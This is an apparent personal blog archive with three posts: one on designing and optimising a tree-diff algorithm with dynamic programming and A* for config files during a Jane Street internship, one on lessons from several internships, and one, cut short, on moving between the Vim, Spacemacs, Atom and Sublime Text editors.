For example, because it stopped recursing and applied a diff as soon as it reached a list of changing length, it would do this:

(this
 (:date-switch
  (case 2017-04-07
   (bar
    ; ... 1000 more lines ...
    baz))
  (else
   (foo
    ; ... 1000 more lines ...
    baz)))
 tests
 (:date-switch
  (case 2017-04-07 adding to a list and modifying a sub-tree)
  (else)))

It duplicates the long sub-tree instead of placing the :date-switch lower down in it, just because we made another edit at a higher level of the tree.

There were a number of other cases where it didn’t produce output as nice as a human would, but earlier on my mentor and I had sighed and accepted it. This though was the last straw, we needed a new approach…

A Tree Diff Optimizer

At this point I was fed up with constantly discovering failure modes of algorithms I thought should work on real-world cases, so I decided to design an algorithm that found the optimal solution.

I started by searching the Internet for tree diff algorithms, but every algorithm I found was either a different kind of diff than what I needed, or was complex enough that I wasn’t willing to spend the time understanding it (probably only to later find out it computed a different kind of diff than I needed).

Specifically, what I needed was mostly like a tree diff but I wasn’t optimizing for the same thing as other algorithms, what I wanted to optimize for was resulting file size, including indentation. This I thought represented what I wanted fairly well, and captured why previous results which duplicated large parts of the file were bad. As well as the character cost of the branches, each additional :date-switch block added more characters. Additionally, each switch construct could also contain multiple sub-trees in each branch, which I needed to model to account for overhead correctly.

Consider the case of (a b c) becoming (A b C). A human would write:

(:date-switch
 (case 2017-04-07 (A b C))
 (else (a b c)))

Despite the fact that the b is duplicated, this is the smallest number of characters. However if we had something longer we’d want something different, so the optimal result even depends on the length of leaf nodes:

((:date-switch (case 2017-04-07 A) (else a))
 this_is_a_super_long_identifier_we_do_not_want_duplicated_because_it_is_looong
 (:date-switch (case 2017-04-07 C) (else c)))

A very common real-world example of why it is important for it to be able to batch together differences is when changing multiple values of a data structure. The config files often have lots of key-value pairs and edits often touch many nearby values:

(thing-processor-config
  (:date-switch
   (case 2017-04-07
    (speed 5)
    (size 80)
    (power 9001))
   (else
    (speed 3)
    (size 80)
    (power 7))))

Even though size didn’t change, we duplicate it because it’s cleaner than having two :date-switch blocks.

Dynamic Programming

After 2+ days of research, discussing ideas with my mentor, and sitting down in a chair staring out at the nice view of London while thinking and sketching out cases of the algorithm in a notebook, I had something. It was a recursive dynamic programming algorithm that checked every possible way of placing the :by-date blocks and chose the best, but used memoization (that’s the dynamic programming part) so that it re-used sub-problems and had polynomial instead of exponential complexity.

The core of the tree diffing problem is similar to the Levenshtein Distance problem, you have two lists that have some number of insertions and deletions between them, and you want to find the best way to match them up. You can do this with a number of different cases based on the first elements of the lists with different costs, calculating those costs involves some constant plus recursively computing the cost for the rest of the lists. Then you compute the cost for each possible decision and take the minimum one.

For example if you have a function best_cost(old,new) to solve the Levenshtein distance problem, there’s three cases for the start of the lists: insert, delete and same. The simplest case is if the first two elements are the same, and characters that are the same cost 0, then the cost is just best_cost(old[1..], new[1..]). If a delete costs 1, then if the start of the list is a delete that means the character is in old but not new so the total cost is 1 + best_cost(old[1..], new). Insert is similar but the opposite direction. This recursion terminates with the base case of best_cost([],[]) = 0. The problem is that this leads to an exponential number of recursive calls.

But we can fix this by noticing that a lot of things are being computed redundantly and sharing the results by “memoizing” the function so that it stores the results for arguments it has been called with before. As seen in the diagram below, where the numbers on the nodes represent calls to best_cost(old[i..], new[j..]) as i,j:

But in some cases it can be difficult to think about the problem as a recursive memoized decision tree. Luckily there’s a different way of thinking about it that lends itself very well to sketching out algorithms in a notebook or on a whiteboard. We can rotate the tree 45 degrees and notice that we can think about it as a grid:

This is useful for memoization since it means we can store our results in an efficient-to-access 2D array, but also because we can now think of our problem as finding a path from the top left of a grid to the bottom right using a certain set of moves. Whenever our decisions are constrained we can annotate the grid where the input lists have a property, like two items being the same. In the example below, we have a diagram of trying to find the Levenshtein distance from “abcd” to “bcad”, with the best path bolded, and an alternative more costly path our algorithm might explore shown dashed.

We can find the best path by testing all the paths and returning the best one. There are exponentially many paths, but we can notice that the best path from a point in the middle of the grid to the bottom right is always the same no matter what moves might have gotten us to that point.

One way to exploit this is to recursively search all paths from the top left, memoizing the best path at each point so we don’t compute it again. This corresponds to the memoizing of recursive functions mentioned earlier and is called the “top-down approach” to dynamic programming.

There’s also the “bottom up” approach where you start from the bottom right and fill in each intersection with the best path based on previously computed results or base cases by using an order where everything you need is always available. In this case it would be right to left, top to bottom, like reading a book from end to start.

Now we know that if we can restate our tree diffing problem as a problem of path-finding on a graph, we can turn that into an implementation using dynamic programming.

The Algorithm

The key differences between my problem and Levenshtein distances were the fact that it was a tree and not a list, and the fact that consecutive sequences of inserts/deletes were cheaper than separate ones (because consecutive edits could be combined in one :date-switch block). My cost function is also different in that I’m measuring the size of the resulting tree including :date-switch blocks, so my moves will need costs based on that.

I can extend the list algorithm to trees by adding a move I’ll call “recurse” that goes down and right and can be done on any square where both items are sub-trees (not leaves). The cost of the move is the cost of the resulting diff from running the entire tree-diff algorithm recursively on those two sub-trees. I don’t bother recursing if the two sub-trees are the same, since the “same” move has identical cost in that case, and is faster to compute.

We can handle the cheaper consecutive inserts and deletes by modeling entering and leaving a :date-switch block as moves. However now we have different move sets based on if we are in or out of a :date-switch block and different costs to get to the end from a given point. We can rectify this by splitting our problem into path-finding over two grids of the same size. One is our “outside” grid, where we can do the “same”, “recurse” and now also a “in” move which moves us to the same position on the other grid.

On the “inside” grid we can do “insert”, “delete” and “out” moves. But that won’t quite work because if “in” and “out” both don’t make forward progress, the graph has a cycle and our search algorithm will endlessly recurse over paths going “in” and “out” at the same point. We can solve this by splitting “out” into “insert out” and “delete out”. The first two are the same as insert and delete except they also move to the “outside” grid, we also have to make sure that we don’t use the “insert” and “delete” moves to go to the bottom right of the “inside” grid, because then we’d be stuck.

This gives us a set of moves that always make forward progress and share as much as possible, with this we can find the best path and that gives us an optimal diff. See the diagram below which also includes the cost of each move and an example path, although not necessarily the optimal one:

Even this model is simplified, because in reality I had to handle input lists that both might have :date-switch blocks already in them, so there were a bunch more cases and contingencies for handling existing :date-switch blocks properly. But those aren’t very interesting and the core of the algorithm is the same.

So I implemented this algorithm on top of the AST manipulation framework I’d built by translating it to a memoized recursive algorithm operating on linked lists. Since the outer algorithm also involved recursion, this meant I had two kinds of recursion, which I structured using OCaml’s ability to define functions inside of other functions. I had an outer scope_diffs function that took two lists of s-expressions and produced a list of s-expressions with differences scoped by :date-switch blocks. Inside it, I allocated two tables to memoize the results in, and defined scope_suffix_diffs_inside and scope_suffix_diffs_outside functions that took indices of the start of the suffixes and mutually recursed and memoized into the tables based on the moves above.

Unlike the Levenshtein difference algorithm I wanted more than just the cost, so I stored the actual scoped s-expressions up to each point in the table directly, because I was using immutable linked lists in OCaml this was memory-efficient since each entry would share structure with the entries it was built from. This way I avoided the back-tracing path reconstruction step that is frequently used with dynamic programming. In order to make the lists share structure I did have to add to the front instead of the back, but I just reversed the best resulting list before I returned it.

Once I finished programming it and got it to compile, I think I only had to fix one place where I’d copy-pasted a +1 where I shouldn’t have and then it worked beautifully. Finally, unlike all my heuristic attempts, I couldn’t find a case where this produced a result significantly worse than what a human would do.

Side note: I used to expect lots of debugging time whenever I finished a bunch of complex algorithmic code, but to my surprise I’ve found that’s rarely the case when using languages with good type systems. The compiler catches almost all small implementation errors, and since I’ve usually spent a long time thinking about all the edge cases carefully while designing the algorithm, there’s usually no serious bugs left by the time it compiles. My tests usually fail a few times, but that’s normally because I wrote the tests wrong.

Unfortunately, while my new algorithm worked quite well for small files, it was very slow on large files. My mentor timed it on a few example files and fit a polynomial and discovered that it was empirically O(n^3) (or it might have been O(n^4) I forget) in the file size. This was unfortunate since some of the files were tens of thousands of lines long. I had to make it faster, luckily while I’d been thinking about and implementing the algorithm I’d accumulated quite a list of optimization ideas to try. But first, I decided to profile to see what the biggest costs were.

Profiling and Optimizing

Incremental cost computation

The first order of business was to discover why the empirical complexity was higher than we thought it should be. My mentor and I tried to come up with a proper analysis of what it should be, but given all the cases and the nested nature of trees there were just too many parameters and we couldn’t come up with anything precise. But, as far as we could tell the complexity of the underlying algorithm should have been about O(n^2*log(n)) in the length of real files.

I could have looked over the implementation carefully to find all the extra unnecessary work, but an easier method was just to use the Linux perf tool to profile it. I knew the work that caused it to be O(n^3) wasn’t at the outer levels of the algorithm, or I would have noticed easily, so it had to be an operation within that would show up in the profiles.

Sure enough, most of the program’s time was spent in the code that computed the length/cost of an s-expression. I had a function that walked a tree and computed its total length, and in the part of the algorithm where I had to choose the lowest-cost move I computed the cost of the entire path from that point, which added an extra O(n) inside the O(n^2) algorithm yielding O(n^3).

In order to fix this, I made sure every cost computation was constant time, which meant I had to construct the cost of a path incrementally as it was constructed, and also not repeatedly walk trees to determine their cost.

I solved this in three steps:

Create a “costed list” type which was a linked list except each item included the cost of the suffix from that point. This had a constant-time prepend operation that just added the cost of the item being prepended to the cost field of the rest of the list.
Modify the Abstract Syntax Tree (AST) data structure to include a cost field on every node, and to use a costed list for children. I also made all the AST builder functions compute the cost of their components by just adding the cost of their overhead with the costs of their child nodes or costed lists. Now both getting the cost of an AST subtree and constructing a node were constant time.
When building the path/diff/result of my algorithm I used a costed list and constructed new :date-switch nodes using the constant-time builder API.

After I did this, our measurements of growth were consistent with the O(n^2*log(n)) we were expecting.

Skipping identical prefixes and suffixes

This was an easy but high-impact optimization I had written down earlier. By the properties of the cost of each move, if a prefix and/or suffix of the two lists was identical, the “same” move would always be the best for those parts of the path. This meant that I could find the longest prefix and suffix of the two lists that was the same and only run the dynamic programming algorithm on the middle part that wasn’t. This made the common case of edits being concentrated at a single point in the file very fast because now the running time was more like O(d^2*log(d)+n) with nbeing file size (large) and d being the size of the edited region (small).

Now almost all common uses of the tool would return instantly except edits in multiple places spread out through a large file. It was now a pretty useful tool, but users having to know which cases to avoid to make the tool not take forever wasn’t great. It would sometimes be used in high-pressure situations and often people did want to make edits in different places, manually batching the edits up and running the tool multiple times wasn’t ideal.

There was also only one or two weeks left in my internship, not much time to do another project, and I think my mentor was having fun challenging me to make the tool perfect and brainstorming how to do so with me. I was also enjoying the process, so the optimization would continue until performance improved!

Tree creation optimization

Profiling indicated a lot of time was spent creating :date-switch AST nodes.

First I wrote a fast-path method of creating and computing cost for :date-switch blocks the algorithm creates since they use a simpler format and a known indentation style than the more general AST construction builder uses.

Additionally, when exploring paths in the “inside :date-switch” table, I used to create a :date-switch node whenever I needed to know the cost so far to decide between moves. Instead, I switched to just adding the costs of the insert and delete branches (which were costed lists), to a known overhead of the :date-switch block. I only created the full node upon exiting to the “outside :date-switch” table.

But my mentor realized this could extend even further: The search for the best path only ever needs to know the cost of a resulting path/tree, we only need the full tree for the best path at the end of the search. So I added a “lazy :date-switch” AST node that has a stored cost computed by fast addition of the cost of the components plus a known overhead, but doesn’t actually create the node immediately and just stores an OCaml lazy thunk that creates it if we try to serialize the result.

More?

My tool was now instant in most common cases and difficult cases were over 100x faster. But, on the very largest 10,000+ line config files it would still take up to 5 minutes in the worst case if you made edits in multiple places. There were no longer any obvious hot spots in the profiles, I needed algorithmic improvements that let me search less possible paths.

I looked at my list of optimization ideas and there was only one left, which I had written down early on in the process when thinking about the correspondence between dynamic programming and path finding on a grid. It was just a few characters in a Markdown note that I had saved for if I was feeling ambitious and really needed it: “A*”.

Path Finding

Back when I was designing the algorithm by thinking about it as a path finding problem, I thought “hey wait, if this is a path finding problem, why not use an actual path finding algorithm?” The first thing I realized is that the memoized recursion approach I was planning on taking was just a depth first search, which can be a path finding algorithm, but not a particularly good one.

Could I use a better path finding algorithm? Breadth first search wouldn’t help much since the goal was near the maximum distance in bounds. However, A*, perhaps the most famous path finding algorithm, seemed like it might help, if only I could come up with a good heuristic. So I wrote it down without thinking too much and came back to it later after I had done all my other optimizations.

The last time I learned A* was when I read Algorithms in a Nutshell (good book) years ago and all I remembered was that it needed a priority queue and a good heuristic. I had a Heap for the priority queue, but I didn’t remember how to actually implement it or what a good heuristic was, so to Wikipedia I went!.

I learned that I needed a heuristic that never overestimated the remaining cost, and that ideally never decreased more than the cost of any move taken. One thing that satisfies those properties is the maximum of the costs of the two list suffixes from a location. This corresponds to the notion that a scoped config file that includes the contents of both config files can’t be smaller than either of the input files. This heuristic was easy to compute using the costed list representation I already had, which already has the cost of each suffix of the input lists.

With a heuristic and an understanding of A* in hand, I refactored the implementation of my algorithm to work by putting successor states in a priority queue based on their cost plus the heuristic remaining cost. This required changing each instance of recursion on my table into the creation of a State structure that encompassed if I was inside or outside of a :date-switch, and the current position.

I also had to make two changes to my data structures. First, since I was no longer using recursion to destructure my linked lists but was now indexing them, which is O(n), I created arrays of the tails of my input costed lists so that random access was fast. Next, my solution still used O(n^2) memory in all cases due to the 2D array memoization table, so I switched that to a hash table from position tuples.

Profiling now showed a lot of time was then spent in hash table lookups, so I experimented with dynamically using a 2D array for small input lists (like were often found on the lower levels of the tree) and a hash table for larger input lists, but further profiling showed it didn’t increase performance much, probably because most of the lookups were in the larger lists, so I stuck with plain hash tables.

After a little debugging of off-by-one errors, I ran the program on my largest test case and it finished instantly. It was so fast I was suspicious it was broken and just skipping all the work, but sure enough it worked perfectly in every case I threw at it. The cost was something like O(n * log(n) * e^2) where n is the file size and e is the number of edits. Me and my mentor managed to think of some edge case trees where it might revert to O(n^2) behavior, and it still only scaled to config files of tens of thousands of lines rather than hundreds of thousands, but it was nearly instant for all cases that might actually occur, so it was good enough™.

I spent the remaining 3 days of my internship polishing up the user interface of the tool, cleaning up the code and writing lots of doc comments explaining my algorithm. I also gave a presentation to a bunch of the other engineers telling a shorter version of the story I’ve written here. That marked the end of my internship with Jane Street and one of the most interesting algorithmic problems I’ve ever worked on, despite it being part of a tool for editing configuration files.

Example Implementation

I was curious about how the approach of turning a dynamic programming problem into an A* path finding problem scaled and how applicable it was to other problems. So, I developed an example implementation of this approach in Rust for the sequence alignment problem, which Levenshtein distance is a specific instance of. It’s structured for simplicity and I haven’t optimized it at all, but it’s good enough to demonstrate the asymptotic improvements.

The core code of the algorithm is fairly simple and is a good demonstration of the logic required to turn a dynamic programming algorithm into an A* path finding instance. It allows you to tune the weights of insertions/deletions, mismatches and matches of characters in the two strings, so that you can change it to be Levenshtein distance or some other instance of sequence alignment.

The heuristic it uses is based on splitting the remaining distance to the bottom right corner into two components: the minimum number of insertion/deletion moves necessary to get on the diagonal from the goal, and the minimum number of match moves necessary to get from that place on the diagonal to the goal. This represents the minimum possible cost required to reach the goal from any position without knowing what the actual best path is.

fn diag(pos: &Pos) -> i32 {
    (pos.1 as i32) - (pos.0 as i32)
}

fn heuristic(pos: &Pos, goal: &Pos) -> Score {
    // find the distance to the diagonal the goal is on
    let goal_diag = diag(goal);
    let our_diag = diag(pos);
    let indel_dist = (our_diag - goal_diag).abs();
    // find the distance left after moving to the diagonal
    let total_dist = max(goal.0 - pos.0, goal.1 - pos.1) as i32;
    let match_dist = total_dist - indel_dist;
    return (indel_dist * INDEL) + (match_dist * MATCH);
}

Discoveries

Here’s some things I learned by fiddling with the program and timing it:

As expected, the algorithm only tends to explore states along the diagonal of the grid, with the width of the area explored proportional to the edit distance. This suggests the running time is something like O((a+b) * e^2) where a and b are the input lengths and e is the edit distance.
Running it on a 10,000 base pair gene sequence with an edit distance of 107 takes 0.26 seconds.
Running it on a 10 megabyte random text file with 1 edit near the beginning and 2 near the end takes 20 seconds and evaluates 40 million states. This is a case where with the O(n^2) algorithm just allocating and zeroing 4*10^14 bytes of memory for a table with the naive algorithm would take forever. Demonstrating that this optimization does in fact provide an asymptotic speed up.
It’s still way slower than specialized sequence alignment implementations like Edlib, probably asymptotically so. These implementations use all sorts of fancy tricks including fancy algorithmic tricks, SIMD and bit vectors to eke out maximum performance for bioinformatics applications. My implementation is at least way way simpler.
Plain Dijkstra’s algorithm (A* with a heuristic always returning 0) actually performs almost as well for Levenshtein distance because only edits have cost so it explores along the diagonal towards the goal along the path with less edits just because those have lower cost. However, if the problem has a cost for matching portions as well (like my original tree diffing problem) Dijkstra’s algorithm will explore in a blob expanding from the top left and be almost as slow as the naive algorithm.
With a heuristic, Levenshtein-distance like instances where only edits have cost take about the same time to run as instances like my tree-diffing problem where matching segments also have cost.

Conclusion

A* is an interesting technique that’s an easy way to accelerate a class of dynamic programming problems. It definitely works on any vaguely diff or edit-distance like problem, but it might extend to even more. If you want absolute peak performance on a simple algorithm there’s probably better techniques to use, I’d start by looking at what bioinformatics people do, but if you just want something easy and flexible this seems like a good technique, and it’s not one I’ve seen done before, and Google doesn’t turn up any results. It might even be novel, or it might just be that A* is a hard term to Google for, I’m interested to hear from anybody who’s seen something like this before.

A great place to work, highly recommend. I did get Jane Street’s permission before divulging the algorithm I wrote for them in this post. ↩

Things I've Learned Doing Internships

2017-04-06T00:00:00+00:00

I’m a student at the University of Waterloo, famous for its co-op program where students do 6 4-month work terms throughout their degree. I’ve now done 7 internships both within the program and outside it. Doing internships before one graduates is a great way of experiencing lots of different teams, work environments and even cities. This has allowed me to gain a much better idea of what kind of place I want to work after I graduate. Every job has taught me something genuinely new: my model of what factors are important to my enjoyment of a job has totally changed.

In this post I’ll share some of what I learned at each different company, especially the things that surprised me and went against conventional wisdom or practice.

Halogen Software

This was my first job, at a company that makes enterprise Java software for HR departments. Back then I was super enthused to have found a job, but nowadays this is the kind of place many of my friends would avoid just on the sound of it. There’s a meme in Waterloo of “Cali or bust” where students try desperately hard to get jobs in California and are very sad if they have to settle for enterprisey boring-sounding jobs.

The thing is, I enjoyed this job and had fun! My coworkers were great and despite working on software many would judge to be boring I found the work engaging.

At Halogen I learned that even companies that exemplify all the stereotypes of a boring company (Java, B2B, CRUD, cubicals, not in California) can be good enjoyable places to work. Just because your job isn’t at the hottest company in California doesn’t mean it will be miserable.

The Eclipse Foundation

My second job was an unpaid co-op job for credit in high-school where I would spend the second half of every school day working. I worked on fixing bugs in the Eclipse IDE off of the bug tracker.

What I learned is that tooling matters a lot. It’s not that the Java tooling I was using allowed me to figure things out faster, it’s what allowed me to do things at all. I could wade in with no experience to a multi-million line code base and fix 11-year old bugs because the Java and Eclipse tooling was so good. The ability to view references and definitions with total accuracy and to follow things in an excellent debugger was key. An interesting Eclipse-specific feature was that every part of Eclipse was a plugin, so instead of spending hours compiling all of Eclipse, you could download the source for the relevant plugin, load it, then immediately press “Run” and it would start a new instance of Eclipse almost immediately that cloned your copy of Eclipse except for that one plugin. To this day it is the largest project I’ve worked on but it had a very fast feedback loop and short setup time, it was quite impressive.

Almost all of Java’s faults as a language were made up for by tooling that was leagues better than any other popular language (excepting maybe C#). This job tempered my enthusiasm for how much more productive $AWESOME_LANGUAGE is than languages like Java and C# despite better design and handy features.

Shopify

I worked at Shopify three times: twice during high school summers and once as my first Waterloo co-op job. As such, I learned a fair amount there, but the lessons were sometimes spread out, so I’ve grouped them together.

Transparent and involved executives are fantastic

The CEO of Shopify, Tobi Lütke, is incredibly awesome. He started as the first developer, and he makes sure to stay afloat with the latest developments and will even weigh in on technical strategy if you tag him on Github. As an intern it was pretty awesome to sit down on a couch with the CEO and hack on Liquid together. He’s also very transparent and makes sure everything about the company is too. For example, every couple weeks he does a frank AMA where he addresses questions submitted and voted on by employees and does a good job of giving detailed answers and not dodging.

On other fridays, employees give lightning talks about what they are working on. This is where one story that really exemplifies the difference between a great CEO and a stereotypical one happened: I was giving a short talk about flaws in the Liquid template parser and how it would accept almost anything without a syntax error, and my work in replacing it. My next term I learned that while watching my talk he’d joked to the person next to him “that kid’s got courage”, which clued me in that at most other companies, trash talking code the CEO wrote that powered an important part of the product, in front of the entire company, would’ve been a “career limiting move” to put it lightly. I had talked to Tobi about the parser rewrite before the talk and he was in fact the first one to admit that the parser had issues, he had even bought a book on parsers hoping to fix it himself someday, so I knew I was safe giving the talk. Regardless, it still shows the benefits of having a great transparent CEO who does his best to rid the company of stifling corporate politics.

Good managers make a big difference

Up until my last internship at Shopify I’d had good team leads, supervisors and managers. I recognized that they were important but they didn’t really affect me or my work that much. This sounds like the lead up to a bad manager story, but actually the thing that changed my mind was having a fantastic team lead/manager.

He was dedicated, competent, funny, relentlessly positive, an excellent advocate for me and the rest of the team. He was also a developer but he spent most of his time being team lead, keeping everything on target, prioritizing, problem solving and making sure we were on target to ship on time.

He had a moderate impact on my productivity: prioritizing, distributing tasks, answering questions and pair programming on difficult tasks. However, he had a tremendous impact on environment of being on the team and thus my enjoyment of the job. I learned that having a good manager helps things run smoothly, but having an excellent manager can make a good job great. I hear that having a bad manager can make a good job terrible, but luckily I have yet to experience that (crosses fingers).

If everything else is done right, the task doesn’t matter

The importance of a good manager ties into my next point, which is that on that same team I was working on a CRUD web app, a stereotypically boring task. However, I really enjoyed that job, and through that I learned that when a company gets everything else right it doesn’t matter very much what the actual task is.

When I was working at Shopify the third time, my team was great, my manager was great, the culture was great, the office was great, the tools were great, the language was great, the food was great, the focus on quality was great, the technical decision-making was great. It didn’t matter that I was working on redesigning a web form.

This isn’t to say the task doesn’t matter at all. If the task was actually an unpleasant one and not just a less exciting form of programming, I wouldn’t have enjoyed it nearly as much.

The University of Waterloo HCI Lab

My next term, following my general strategy of trying out as many different jobs as possible, despite enjoying my previous job so much I tried out research. I worked on a system that fused eye tracking, head tracking and sound recognition to provide a hands-free mouse alternative that I could use as quickly as I can a trackpad. I also worked on custom computer vision systems for eye tracking and marker tracking, as well as developing custom audio recognition algorithms. I basically got free reign to work on a side project I had as a job and do exactly the work I wanted and found interesting.

Further learning on project coolness

This switch from working on CRUD web apps to a cool project that I had chose myself furthered my learning from the previous term. Despite working on my choice of the most interesting topic, although I definitely enjoyed the job, I didn’t enjoy it as much as my previous internship at Shopify.

There were two components to this:

First, the magnitude in difference of how interesting a project sounds doesn’t correspond to the magnitude of difference in how interesting working on a project is. Working on cool computer vision systems involves a lot of architecture, plumbing, refactoring and debugging. Most of these tasks are the same kind of tasks one does when working on a CRUD web app. Even when I was working on redesigning a web form there were times when I had to go sit away from the computer and think really hard with a notepad about architectural issues and how to design the system in a clean and robust way. Despite massive differences in how interesting they sounded, the computer vision system only involved moderately more interesting difficult problems and slightly less boring plumbing than the CRUD web app.

Secondly, I found that even when I was working on the interesting challenging parts, I enjoyed and valued the challenge and learning, but not as much as I expected to value them before I started the job. The difference in fun was tangible but not as extreme as I had imagined.

Previous to this term I had systematically overvalued the importance of the challenge and interestingness of the task. I also see this a lot when people I know choose jobs, they’ll sacrifice pay, company quality, location choice, team, culture, perks and pretty much everything else if it means they can work on something cool like compilers for machine learning on big data. I did exactly this as well for my research term.

Interestingness of the work is still a significant positive factor when I’m choosing a job, it just no longer overrides all other considerations, it’s more of a factor I use to decide between two good options.

Teams

One part of the difference between working in the lab and working at Shopify was that in the lab I was working alone on my own project. There were other people in the lab that I talked to occasionally but we didn’t really work together or even eat lunch together.

I realized that great coworkers are an important part of why I enjoyed my previous jobs.

Jane Street

For my next internship I worked at Jane Street in London UK. I worked on developer tools, low-latency networking code, rendering huge tables and tree-diffing algorithms, all in OCaml. I had a great time, both with the interesting work and all the other parts of working there.

Interviewing

The first thing that impressed me about Jane Street, because it was before I even started, was how good their interviewing system is. The questions seemed rather good at testing programming ability rather than algorithm knowledge or flashes of inspiration. They were about thinking hard, puzzling out all the cases and extracting a clean design. I was allowed to use a whiteboard, their laptop, or my own laptop, with any language I wanted. Each interview had two interviewers in the room, I assume for higher judgement reliability for the time spent. There were a reasonable number of interviews packed in to one day, and I got an offer a fairly short amount of time after I interviewed.

Later I learned that they have a set of people who specialize in interviewing and do substantially more interviews because they like to and for greater consistency and skill specialization. Each question is well-specified and alpha and beta tested before being used for decision-making. Becoming the lead of the two interviewers for a specific question requires having shadowed someone else who knows it well.

This interview process seems substantially better than any other process that I have heard of (with the possible exception of the Matasano process tptacek on HN talks about, but I haven’t looked into that much). It addresses many of the common criticisms of tech company interviews like algorithm bingo, requiring flashes of inspiration, requiring coding on a whiteboard, poor question design, inexperienced interviewers and lack of inter-rater reliability. It seems like it would have a very low false positive rate, and a lower (though still significant) false negative rate than other interview processes I’ve seen.

Agency

Another thing that impressed me is the level of agency afforded to employees. The management structure was extremely flat, and everyone’s job was basically either “Do what’s best for the company, probably coding” or “Do what’s best for the company, probably trading” with some people in between and a few “… with some managing” thrown in.

For certain type of company, this seems to work excellently. Competent people know that for decisions with sufficiently high stakes it is a good idea to seek input from others, and expend effort to make the right decision proportional to the stakes. This means there’s little need for explicit policies, procedures and approval chains. That doesn’t mean the value they provide is absent, they just happen whenever they make sense for the task at hand, like ops checklists and working with other people to make big decisions correctly. I was surprised by the extent to which “Do what’s best” gets the benefits of standard corporate practices when helpful, but avoids the pitfalls. I still don’t believe this is broadly applicable though, it needs a certain type of company to work well.

Conclusion

My model of what a good job and an effective company looks like have changed significantly since before I started working. Since starting at Waterloo I’ve even precommitted to not doing repeat internships, so as to maximize the variety of jobs, locations, and companies I experience. It’s tempting to return when I have a great time and a job is the best one I’ve ever had, but I remember that the only reason I took that job was that I didn’t return to the previous best job I ever had.

I’m looking forward to further learning at 3 more internships before I graduate, including one in San Francisco at Google this summer. After I graduate, I’ll look hard at all the different jobs I’ve had and will have a good model with which to decide what I want to do next. This will likely be returning to my favourite past company, but I might also use this information to choose a brand new path I’m confident is better.

My Text Editor Journey: Vim, Spacemacs, Atom and Sublime Text

2017-03-04T00:00:00+00:00

I currently use a highly customized Sublime Text 3 as my text editor for almost all programming. However, people are often surprised to learn that I’ve used Vim for 6 months, Emacs/Spacemacs for 10 months (including much elisp hacking) and Atom for a month, yet I still prefer Sublime.

This post explains my journey between text editors, what I learned, what I like and dislike about each of them, and why in the end I’ve chosen Sublime (for now). Most detailed is my reasoning for abandoning Spacemacs, despite being a top contributor and power user, although many of my criticisms of Vim also apply to Spacemacs (and vice versa).

The Early Days: Textmate & Sublime Text 2

My text editor when I first learned programming was Textmate, and I stuck with it for a few years (I forget how many) before I at some point switched to Sublime Text 2’s trial, and then paid for a license.

Back then I only used the basics: syntax highlighting, find/replace, autocomplete, file tree… I didn’t know any keyboard shortcuts besides standard OS ones like copy-paste and undo. I used the mouse for all selection and eventually learned the Sublime command pallete and “open file in project” pallete.

This setup didn’t cause me any trouble, I was productive and nothing was painful. But, I heard tell of the true power one gained upon learning to use a real editor like Vim or Emacs. I watched screencasts where Vim masters would perform impressive editing operations in a couple keystrokes.

Vim: A Taste of Power

In late 2012 I switched to Vim. I learned the keyboard shortcuts with vimtutor and printed cheat sheets. I read tons of blog articles (often conflicting) on learning and using Vim the right way.

I tried using a blank .vimrc and building pieces from scratch making sure I understood what each piece did each time. However, this was taking far too long, my editor was missing key functionality from Sublime and Textmate like a file tree, good autocomplete, open in project, and support for languages I used. It was also ugly.

So I started using the spf13 Vim distribution. It was nice, and had most of the features I wanted. You can still find my modified spf13-based vimrc here.

I was reasonably happy with this setup and continued using it for over 6 months.

However, there were many pain points. One of these was that things often didn’t work. For example, my tab key was bound to tons of different things like autocomplete, snippet expansion, indentation, moving between snippet fields and inserting the literal tab character. Many of those overrode each other in different contexts, but very often it chose the wrong one. I ended up fixing this somewhat but not completely, but I didn’t have this issue in Sublime because everything was designed to work together so the tab key just always did what I wanted. Even after I fixed it, the hours I spent diagnosing the issue, figuring out how to resolve the conflicts, implementing it, then re-learning my muscle memory probably erased weeks of sub- second Vim speed gains.

Another issue I had was that Vim was mouse-hostile. I was fully aware that the Vim philosophy is to just never use the mouse. However, even with plugins like EasyMotion and ideal vim shortcut use the keyboard is slower for some selection tasks like selecting a range of text far from the cursor than the mouse is. Often using Vim shortcuts felt faster because my brain was engaged figuring out the optimal combination of motions and looking for EasyMotion hints, but whenever I timed myself I was consistently much slower than I was with the mouse. I’m only talking about long range selection and cursor movement here, I totally concede that keyboard shortcuts are better for short range movement and selection. Vim wasn’t that bad for the mouse, but lots of plugins didn’t really work well with it and mouse selection often worked weirdly in some states.

Back to Sublime (with a stint in Atom)

I realized that I didn’t like fighting my editor and loved the ease of use and mouse support of Sublime. However, I also loved the power of Vim’s keyboard model. Luckily, I could use Vintageous.

This way I could get all the power I liked about Vim with all the niceties of Sublime.

In fact, Vintageous is arguably more powerful than Vim itself because it works with multiple cursors. Using multiple cursors with Vim bindings is incredible, it’s basically the same power as Vim macros give you, except you can compose them on the fly with instant feedback about what commands did at each place you wanted to use them (see gif below). I found I rarely used macros with Vim because I had to think hard about which commands I could use that would work on every instance and make sure I didn’t screw anything up, then figure out how I wanted to run the macro for each location, but with Sublime it was so easy I did it all the time. Yes, I know both Vim and Emacs have multiple cursor plugins, but they are hacks and don’t seamlessly work with all commands and together with the mouse.

I started using Sublime as a power user’s text editor just like I had used Vim. I learned the keyboard shortcuts, read about the functionality and installed plugins.

For a month I also tried out Atom. I pretty much replicated my Sublime Text setup with the equivalent Atom plugins, plus some extras that only Atom offered. However, I preferred Sublime’s speed. It wasn’t just that some editing operations had a bit of latency, but that Sublime could offer features that Atom couldn’t because of its speed. For example Sublime’s “open in project” panel instantly previews the files as you type because it can load files in milliseconds, and search is incremental by default.

I used this setup quite happily from mid-2013 to late-2014. However, I started thinking about the possibility of using Emacs with evil-mode. I’d heard its Vim emulation was fantastic and the possibility of using Emacs lisp to craft the perfect text editing experience given time was enticing.

I started looking around at various Emacs starter kits like Prelude and tried out a few. I read Emacs articles, documentation and blog posts about people’s Emacs configs. However, everything had really horrible convoluted hard to remember keyboard shortcuts that didn’t fit well with Vim’s.

Spacemacs

Then, I found Spacemacs. It was exactly what I was looking for. It was pretty, integrated Vim and Emacs functionality in an interesting and discoverable way, and promised to have everything set up to work out of the box. Somehow this project only had around 12 stars on Github and no other contributors. It seemed the creator had poured tons of effort into making a fantastic project, but unlike most people’s dotfiles, he put effort and thought into making it adaptable to individual needs and documenting how to do so. I was stunned that this project only had ~20 stars and no other contributors.

So I downloaded it, started working on my own .spacemacs file and joined the Gitter chat the creator had set up. A little while later I submitted the first contribution to the project.

